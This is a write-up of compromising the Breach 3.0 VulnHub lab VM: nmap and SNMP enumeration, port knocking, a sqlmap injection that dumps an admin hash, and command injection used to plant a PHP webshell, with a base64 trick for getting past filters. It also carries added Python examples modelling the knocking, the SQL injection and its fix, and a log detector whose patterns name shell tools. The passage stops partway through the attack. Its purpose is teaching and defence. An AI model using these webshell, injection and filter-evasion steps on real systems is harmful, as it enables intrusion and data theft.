
Breach 3.0 target machine penetration write-up

Challenge link: https://www.vulnhub.com/entry/breach-301,177/

After downloading the VM file, first rename it so its extension is ova (remove the leading “.”), then open the file in VMware to import it as a virtual machine. Once the import finishes, set the network mode to NAT with a DHCP server so the target can obtain an IP address automatically, then power on the VM.

When the VM boots it reports that it is configuring the network automatically; the target runs Ubuntu 14.04. After it has started, check the subnet of the VM network adapter and run an nmap ping sweep across that subnet to find live hosts:

```
nmap -sn 192.168.229.0/24
```

The scan shows two live hosts: one is my Kali VM (192.168.229.128), so the other must be the target, whose IP address is 192.168.229.129.

The next step is to keep gathering information on the target, again using nmap to scan for open ports:

```
nmap -T4 -A -v 192.168.229.129
```

The result shows not a single open TCP port. Strange: with no entry point, how do you break in? So I also scanned for open UDP ports:

```
☁  ~  nmap -sS -sU -T4 -A -v 192.168.229.129
Starting Nmap 7.70 ( https://nmap.org ) at 2018-09-19 09:21 EDT
NSE: Loaded 148 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 09:21
Completed NSE at 09:21, 0.00s elapsed
Initiating NSE at 09:21
Completed NSE at 09:21, 0.00s elapsed
Initiating ARP Ping Scan at 09:21
Scanning 192.168.229.129 [1 port]
Completed ARP Ping Scan at 09:21, 0.03s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 09:21
Completed Parallel DNS resolution of 1 host. at 09:21, 0.01s elapsed
Initiating SYN Stealth Scan at 09:21
Scanning 192.168.229.129 [1000 ports]
Completed SYN Stealth Scan at 09:21, 21.53s elapsed (1000 total ports)
Initiating UDP Scan at 09:21
Scanning 192.168.229.129 [1000 ports]
Discovered open port 161/udp on 192.168.229.129
Completed UDP Scan at 09:22, 10.01s elapsed (1000 total ports)
Initiating Service scan at 09:22
Scanning 1000 services on 192.168.229.129
Service scan Timing: About 0.40% done
Service scan Timing: About 3.20% done; ETC: 11:03 (1:38:19 remaining)
Service scan Timing: About 6.20% done; ETC: 10:40 (1:13:53 remaining)
Service scan Timing: About 9.20% done; ETC: 10:32 (1:04:09 remaining)
Service scan Timing: About 12.20% done; ETC: 10:28 (0:58:32 remaining)
Service scan Timing: About 15.20% done; ETC: 10:26 (0:54:29 remaining)
Service scan Timing: About 18.20% done; ETC: 10:24 (0:51:10 remaining)
Service scan Timing: About 23.50% done; ETC: 10:17 (0:42:39 remaining)
Service scan Timing: About 24.20% done; ETC: 10:22 (0:45:50 remaining)
Service scan Timing: About 29.40% done; ETC: 10:17 (0:39:16 remaining)
Service scan Timing: About 35.40% done; ETC: 10:17 (0:35:46 remaining)
Service scan Timing: About 41.40% done; ETC: 10:17 (0:32:21 remaining)
Service scan Timing: About 47.40% done; ETC: 10:17 (0:28:59 remaining)
Service scan Timing: About 53.40% done; ETC: 10:17 (0:25:38 remaining)
Service scan Timing: About 59.40% done; ETC: 10:16 (0:22:18 remaining)
Service scan Timing: About 65.40% done; ETC: 10:16 (0:18:59 remaining)
Service scan Timing: About 71.40% done; ETC: 10:16 (0:15:41 remaining)
Service scan Timing: About 77.40% done; ETC: 10:16 (0:12:23 remaining)
Service scan Timing: About 83.40% done; ETC: 10:16 (0:09:05 remaining)
Service scan Timing: About 88.90% done; ETC: 10:17 (0:06:06 remaining)
Service scan Timing: About 94.90% done; ETC: 10:17 (0:02:48 remaining)
Completed Service scan at 10:17, 3319.00s elapsed (1000 services on 1 host)
Initiating OS detection (try #1) against 192.168.229.129
Retrying OS detection (try #2) against 192.168.229.129
NSE: Script scanning 192.168.229.129.
Initiating NSE at 10:17
Completed NSE at 10:18, 45.22s elapsed
Initiating NSE at 10:18
Completed NSE at 10:19, 55.12s elapsed
Nmap scan report for 192.168.229.129
Host is up (0.0042s latency).
Not shown: 1000 filtered ports, 999 open|filtered ports
PORT STATE SERVICE VERSION
161/udp open snmp SNMPv1 server; net-snmp SNMPv3 server (public)
| snmp-info:
| enterprise: net-snmp
| engineIDFormat: unknown
| engineIDData: ad610f2abb4d5b5800000000
| snmpEngineBoots: 19
|_ snmpEngineTime: 1h08m06s
| snmp-sysdescr: Linux Initech-DMZ01 4.4.0-45-generic #66~14.04.1-Ubuntu SMP Wed Oct 19 15:05:38 UTC 2016 x86_64
|_ System uptime: 1h08m7.02s (408702 timeticks)
MAC Address: 00:0C:29:76:41:E4 (VMware)
Too many fingerprints match this host to give specific OS details
Network Distance: 1 hop
Service Info: Host: Initech-DMZ01

TRACEROUTE
HOP RTT ADDRESS
1 4.20 ms 192.168.229.129

NSE: Script Post-scanning.
Initiating NSE at 10:19
Completed NSE at 10:19, 0.00s elapsed
Initiating NSE at 10:19
Completed NSE at 10:19, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 3455.13 seconds
Raw packets sent: 4049 (152.554KB) | Rcvd: 3 (308B)
```

Only port 161 is open, running an SNMP service. At this point the idea is to pull whatever information this port exposes, so I searched Baidu for SNMP commands, but learned little beyond the fact that there is a GET operation. So in Kali I typed snmp followed by Tab:

```
☁  ~  snmp
snmp-bridge-mib snmp-check snmpget snmpset snmptrap
snmpbulkget snmpconf snmpgetnext snmpstatus snmpusm
snmpbulkwalk snmpd snmpinform snmptable snmpvacm
snmpc snmpdelta snmpkey snmptest snmpwalk
snmpcheck snmpdf snmpnetstat snmptranslate
```

That revealed snmpget, the command related to GET, so I gave it a try and found the following:

```
☁  ~  snmpget 192.168.229.129
snmp-check v1.9 - SNMP enumerator
Copyright (c) 2005-2015 by Matteo Cantoni (www.nothink.org)

[+] Try to connect to 192.168.229.129:161 using SNMPv1 and community 'public'

[*] System information:

Host IP address : 192.168.229.129
Hostname : Initech-DMZ01
Description : Linux Initech-DMZ01 4.4.0-45-generic #66~14.04.1-Ubuntu SMP Wed Oct 19 15:05:38 UTC 2016 x86_64
Contact : Email: Milton@breach.local - (545)-232-1876
Location : Initech - is this thing on? I doubt anyone thinks to look here, anyways, I've left myself a way back in and burn the place down once again.
Uptime snmp : 15:12:39.80
Uptime system : 15:12:23.84
System date : 2018-9-20 00:21:49.0
```

“Is this thing on? I doubt anyone would think to look here; anyway, I've left myself a way back in and burned the place down once again.” This says the challenge author left a backdoor here and burned (destroyed) it on the way out. It is actually a trap: with only this one port it is very hard to get any further, but since the author says a way back in was left, there must be some way to open a few TCP ports. That led me to the port knocking service: https://www.cnblogs.com/wsjhk/p/5508051.html

```
apt-get install knockd
```

The thing in the output that most resembles a knock sequence is the number after the email address, so:

```
knock 192.168.229.129 545 232 1876
```

The command prints nothing, but scanning the TCP ports again now shows many more open:

```
Scanning 192.168.229.129 [1000 ports]
Discovered open port 23/tcp on 192.168.229.129
Discovered open port 22/tcp on 192.168.229.129
Discovered open port 10010/tcp on 192.168.229.129
Discovered open port 5800/tcp on 192.168.229.129
Discovered open port 2048/tcp on 192.168.229.129
Discovered open port 10009/tcp on 192.168.229.129
```

Seeing telnet, I tried connecting to it first:

```
☁  ~  telnet 192.168.229.129
Trying 192.168.229.129...
Connected to 192.168.229.129.
Escape character is '^]'.
I used to have a backdoor here but they closed it down around when they moved my desk into the basement.
Connection closed by foreign host.
```

“I used to have a backdoor here, but they closed it down when they moved my desk into the basement.”
No ideas from that, so next I tried connecting over SSH:

```
 ~  ssh root@192.168.229.129
**********************************************************************
* *
* The Bobs Cloud Hosting, LLC. Secure Backdoor *
* *
* *
* If you wish to discuss cloud hosting options, give us a call at *
* *
* 555-423-1800 or email us at thebobs@thebobscloudhostingllc.net *
* *
**********************************************************************

root@192.168.229.129's password:
```

I didn't know the password and was stuck here for a while, until I suddenly noticed that this knock sequence differs from the earlier one. Knock again:

```
knock 192.168.229.129 555 423 1800
```
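As an added example (not code from the write-up or from knockd itself), the following Python models the server side of the port knocking used at both knocks above: the first sequence taken from the SNMP contact number and the second from the SSH banner. The packet stream and source addresses are constructed, and the timeout mirrors knockd's seq_timeout option.

```python
# Added example, not code from the write-up or from knockd: a minimal model of
# how a port-knocking daemon decides that a source has "knocked" correctly.
# Sequences are the two from the write-up; packet streams are constructed.
from typing import Dict, List, Tuple

class KnockTracker:
    """Per-source progress through a secret port sequence.

    A packet to the expected next port advances the state; any other port
    resets it. The whole sequence must arrive within `timeout` seconds
    (knockd calls this seq_timeout), otherwise progress is discarded.
    """

    def __init__(self, sequence: List[int], timeout: float = 5.0) -> None:
        self.sequence = sequence
        self.timeout = timeout
        self._progress: Dict[str, Tuple[int, float]] = {}  # src -> (next index, first knock time)

    def knock(self, src: str, port: int, ts: float) -> bool:
        """Feed one (source, destination port, timestamp); True when the sequence completes."""
        idx, first_ts = self._progress.get(src, (0, ts))
        if idx > 0 and ts - first_ts > self.timeout:
            idx, first_ts = 0, ts  # too slow: start over
        if port == self.sequence[idx]:
            idx += 1
        else:
            # a wrong port resets; a correct first knock may restart the sequence at once
            idx, first_ts = (1, ts) if port == self.sequence[0] else (0, ts)
        if idx == len(self.sequence):
            self._progress.pop(src, None)
            return True
        self._progress[src] = (idx, first_ts)
        return False

def knockers(sequence: List[int], packets: List[Tuple[str, int, float]]) -> List[str]:
    """Sources in `packets` that completed `sequence`; the daemon would open the
    hidden ports only for these."""
    tracker = KnockTracker(sequence)
    return [src for src, port, ts in packets if tracker.knock(src, port, ts)]

# Constructed packet stream: a correct 545,232,1876 knock, a scanner hitting the
# same ports in the wrong order, and a knock that arrives too slowly.
PACKETS = [
    ("192.168.229.128", 545, 0.0), ("192.168.229.128", 232, 0.1), ("192.168.229.128", 1876, 0.2),
    ("10.0.0.7", 1876, 1.0), ("10.0.0.7", 232, 1.1), ("10.0.0.7", 545, 1.2),
    ("10.0.0.9", 545, 2.0), ("10.0.0.9", 232, 9.0), ("10.0.0.9", 1876, 9.1),
]
```

The knock itself is no authentication: anyone who can read the sequence (here, from an SNMP contact field and an SSH banner) gets the same ports opened, which is why the real services behind it still need their own credentials.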

Checking the open ports again shows a new TCP port 8 running apache-httpd, so I opened it in the browser. The site asks for authentication; the credentials were left behind in the first two challenges of this series: milton|thelaststraw. Logging in with them shows the following page:

There is a to-do list, and one item mentions “plunder all their databases”. Clicking the link at the bottom leads to what looks like the site's backend login page:

Combined with the earlier hint, this is clearly an injection page, so out comes sqlmap. It is a POST injection; part of the HTTP request I captured is:

```
Referer: http://192.168.229.129:8/breach3/index.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 47
Cookie: PHPSESSID=nigh3kqnonu8co9frhn9fa6rh6
Authorization: Basic bWlsdG9uOnRoZWxhc3RzdHJhdw==
Connection: close
Upgrade-Insecure-Requests: 1

username=test&password=asdasdasd&submit=+Login+
```

So the command is:

```
sqlmap -u "http://192.168.229.129:8/breach3/index.php" --dbms=mysql --auth-type=basic --auth-cred=milton:thelaststraw --level=3 --risk=3 --data="username=me&password=me&submit=+Login+" -p password -D thebobs --dump
```

The result is:

```
Database: thebobs
Table: login
[1 entry]
+----+----------+------------------------------------------+
| id | username | password                                 |
+----+----------+------------------------------------------+
| 1  | admin    | 8f4fadb24304d60d9dcb1589aa6a5c2d2d373229 |
+----+----------+------------------------------------------+
```

Log in with this account.
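Added example, not the target's PHP or the write-up's code: a model of why sqlmap could inject through the password field, beside the parameterized form that closes the hole. The target's actual query is not shown in the write-up, so the `password = sha1('...')` query shape is an assumption; the `login` rows mirror the dump above, plus a constructed `tester` row whose plaintext is known.

```python
# Added example (assumed query shape, not the target's real source): the same
# login query built by string formatting and with bound parameters.
import hashlib
import sqlite3
from typing import Optional

ADMIN_HASH = "8f4fadb24304d60d9dcb1589aa6a5c2d2d373229"  # from the sqlmap dump

def sha1_hex(s: str) -> str:
    return hashlib.sha1(s.encode()).hexdigest()

def make_db() -> sqlite3.Connection:
    """In-memory copy of thebobs.login; sha1() stands in for MySQL's SHA1()."""
    conn = sqlite3.connect(":memory:")
    conn.create_function("sha1", 1, sha1_hex)
    conn.execute("CREATE TABLE login (id INTEGER, username TEXT, password TEXT)")
    conn.execute("INSERT INTO login VALUES (1, 'admin', ?)", (ADMIN_HASH,))
    conn.execute("INSERT INTO login VALUES (2, 'tester', ?)", (sha1_hex("s3cret"),))  # constructed row
    return conn

def login_vulnerable(conn: sqlite3.Connection, username: str, password: str) -> Optional[str]:
    """Form input is pasted into the SQL text, so the password value can
    rewrite the WHERE clause; returns the matched username or None."""
    sql = ("SELECT username FROM login WHERE username = '%s' "
           "AND password = sha1('%s')" % (username, password))
    row = conn.execute(sql).fetchone()
    return row[0] if row else None

def login_safe(conn: sqlite3.Connection, username: str, password: str) -> Optional[str]:
    """Same query with bound parameters: the input is data, never SQL."""
    sql = "SELECT username FROM login WHERE username = ? AND password = sha1(?)"
    row = conn.execute(sql, (username, password)).fetchone()
    return row[0] if row else None

# A password value that closes the sha1('...') call and appends a tautology;
# the trailing "-- " comments out the rest of the original query.
INJECTED_PASSWORD = "') OR 1=1 -- "
```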

This enters the admin interface, which reveals more pages:

Contents of the page http://192.168.229.129:8/breach3/initechnetmonitor.php:

This shows the host's network information, and ICMP is listed as disabled, meaning a direct ping of this server gets no reply. That made me curious: if it can't be pinged, how did nmap identify this host during my initial ping sweep?

With this many pages and apparently no deeper directories, I fired up AppScan. The scan reports a command execution vulnerability on the site, so I tried echoing a one-line shell into a txt file:

```
http://192.168.229.129:8/breach3/thebobscloudhostingllc/livechat.php?searcher=echo '<?php echo shell_exec($_GET['e']); ?>' >test.txt
```

test.txt now contains the one-liner, so the write succeeded.

What next? Write a small webshell, of course:

```
http://192.168.229.129:8/breach3/thebobscloudhostingllc/livechat.php?searcher=echo '<?php echo shell_exec($_GET['e']); ?>' >shell.php
```

Now check whether our webshell works:

```
http://192.168.229.129:8/breach3/thebobscloudhostingllc/shell.php?e=ls
```

It runs, perfect. There is a small trick worth knowing here: if the shell is written in plaintext, a WAF or some filtering rule may strip part of the symbols or commands from the statement, so you can instead base64 encode it first and decode it on the server:

```
☁  ~  echo '<?php echo shell_exec($_GET['e']); ?>' | base64
PD9waHAgZWNobyBzaGVsbF9leGVjKCRfR0VUW2VdKTsgPz4K
```

```
http://192.168.229.129:8/breach3/thebobscloudhostingllc/livechat.php?searcher=echo PD9waHAgZWNobyBzaGVsbF9leGVjKCRfR0VUW2VdKTsgPz4K | base64 -d > shell.php
```

This way the content being written cannot be mangled by a filter.
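Added example (not from the write-up): a defender-side check that runs over constructed Apache access-log lines modelled on the livechat.php requests above, including the base64 variant. It flags query parameters that carry shell metacharacters or PHP tags either as sent or after decoding base64-looking tokens, so the encode-then-decode trick does not slip past a plaintext-only filter. The log lines, timestamps and client address are constructed.

```python
# Added example: detection of command-injection requests in access logs.
# The log lines below are constructed to resemble the write-up's requests,
# percent-encoded as a browser would send them; they are not real captures.
import base64
import re
from typing import List, Tuple
from urllib.parse import parse_qsl, urlsplit

LOG = [
    '192.168.229.128 - milton [19/Sep/2018:10:30:01 -0400] "GET /breach3/thebobscloudhostingllc/livechat.php?searcher=printer HTTP/1.1" 200 512',
    '192.168.229.128 - milton [19/Sep/2018:10:31:12 -0400] "GET /breach3/thebobscloudhostingllc/livechat.php?searcher=echo%20%27%3C%3Fphp%20echo%20shell_exec(%24_GET%5B%27e%27%5D)%3B%20%3F%3E%27%20%3Eshell.php HTTP/1.1" 200 88',
    '192.168.229.128 - milton [19/Sep/2018:10:32:40 -0400] "GET /breach3/thebobscloudhostingllc/livechat.php?searcher=PD9waHAgZWNobyBzaGVsbF9leGVjKCRfR0VUW2VdKTsgPz4K HTTP/1.1" 200 88',
    '192.168.229.128 - milton [19/Sep/2018:10:33:05 -0400] "GET /breach3/thebobscloudhostingllc/shell.php?e=ls HTTP/1.1" 200 300',
]

SHELL_META = re.compile(r"[;|&`$><]|\b(base64|bash|nc|wget|curl)\b")
PHP_TAG = re.compile(r"<\?php|\$_(GET|POST|REQUEST)\b")
B64_TOKEN = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")
LOG_LINE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) HTTP/[\d.]+" \d{3}')

def decoded_b64(text: str) -> str:
    """Decoded form of every base64-looking token in `text` (invalid ones skipped)."""
    out = []
    for tok in B64_TOKEN.findall(text):
        try:
            out.append(base64.b64decode(tok, validate=True).decode("utf-8", "replace"))
        except ValueError:  # binascii.Error is a ValueError subclass
            pass
    return " ".join(out)

def suspicious_params(url: str) -> List[str]:
    """Names of query parameters carrying shell metacharacters or PHP code,
    checked both as sent and after base64 decoding."""
    hits = []
    for name, value in parse_qsl(urlsplit(url).query, keep_blank_values=True):
        text = value + " " + decoded_b64(value)
        if SHELL_META.search(text) or PHP_TAG.search(text):
            hits.append(name)
    return hits

def scan_log(lines: List[str]) -> List[Tuple[str, str]]:
    """(client IP, parameter name) for each request flagged as injection."""
    flagged = []
    for line in lines:
        m = LOG_LINE.match(line)
        if m:
            flagged.extend((m.group(1), p) for p in suspicious_params(m.group(2)))
    return flagged
```

The fourth line (using the dropped shell with `e=ls`) is deliberately not caught by this rule: spotting use of an already-planted file needs a different signal, such as requests for .php files that were never deployed.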

From here you can start looking through the files, but there are a lot of them. Challenge authors usually put the important files in folders such as home and tmp, so check those first:
